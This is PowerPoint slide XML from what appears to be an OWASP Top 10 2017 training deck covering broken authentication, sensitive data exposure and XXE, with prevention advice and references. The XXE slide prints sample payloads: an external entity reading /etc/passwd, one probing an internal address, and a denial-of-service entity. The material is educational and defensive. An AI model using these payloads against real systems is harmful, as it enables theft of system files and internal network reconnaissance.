                        <a:rPr lang="en-US" sz="11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Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force and dictionary attack tools, and advanced GPU cracking tools.</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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The prevalence of broken authentication is widespread due to the design and implementation of most identity and access management systems.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attackers can detect broken authentication using manual means, but are often attracted by password dumps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>, or after a social engineering attack such as phishing or similar. </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Arial"/>
                        </a:rPr>
                        <a:t>Attackers only have to gain access to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site doesn't use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless network), and steals the user's session cookie.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above he could alter all transported data, e.g. the recipient of a money transfer.</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The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.</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Data Exposure?</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The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, and personal information require extra protection, particularly if that data falls under the EU's General Data Protection Regulation (GDPR), local privacy laws or regulations, financial data protection regulations and laws, such as PCI Data Security Standard (PCI DSS), or health records laws, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Health Insurance Portability Act (HIPAA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.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any data of a site transmitted in clear text, internally or externally? Internet traffic is especially dangerous, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>but from load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>balancers to web servers or from web servers to back end systems can be problematic</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any old or weak cryptographic algorithms used either by default or in older code? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A6:2017-Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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Are default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing?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 encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</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see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS areas Crypto (V7), Data Prot (V9) and SSL/TLS (V10)</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900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Protect Data</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de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard (V7,9,10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE"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6"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Cheat Sheet - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Transport Layer Protection</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7"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet - User Privacy Protection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8"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet - Password Storage</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OWASP Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Cryptographic Storage</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Security Headers Project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1"/>
              </a:rPr>
              <a:t>OWASP Testing Guide - Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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2"/>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3"/>
              </a:rPr>
              <a:t>CWE-359 Exposure of Private Information (Privacy Violation)</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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE-220 Exposure of sens. information through data queries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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> CWE-310 Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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6"/>
              </a:rPr>
              <a:t>CWE-326 Weak Encryption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7"/>
              </a:rPr>
              <a:t>CWE-312 Cleartext Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng"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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>CWE-319 Cleartext Transmission of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Aria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Classify data processed, stored or transmitted by a system. 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Review the privacy laws or regulations applicable to sensitive data, and protect as per regulatory requirements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Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data you don’t retain can’t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Make sure you encrypt all sensitive data at rest </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Encrypt all data in transit, such as using TLS. Enforce this using directives like HTTP Strict Transport Security (HSTS).</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up-to-date and strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>crypto modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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passwords are stored with a strong adaptive algorithm appropriate for password protection, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Argon2</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1"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a: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22"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Configure the work factor (delay factor) as high as you can tolerate.</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Verify independently the effectiveness of your settings.</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a:t>Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3848396451"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957600"/>
          <a:ext cx="6861600" cy="215772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1" i="0" u="none" strike="noStrike" kern="1200" baseline="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Even anonymous attackers typically don’t break crypto directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manual attack is generally required.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data in rest. Both with very varying exploitability.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive personal information (PII) data such as health records, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" err="1">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>cre-dentials</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, personal data, credit cards, which often requires protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The easiest way is to upload a malicious XML file, if accepted:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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attacker  attempts to extract data from the server:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;!DOCTYPE foo [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;!ELEMENT foo ANY &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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probes the server's private network by changing the above ENTITY line to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</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An attacker attempts a denial-of-service attack by including a potentially endless file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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XXE?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90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Applications and in particular XML-based web services or downstream integrations might be vulnerable to attack if:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Any of the XML processors in the application or SOAP based web services has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> enabled. As the exact mechanism for disabling DTD processing varies by processor, it is recommended that you consult a reference such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">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If your application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
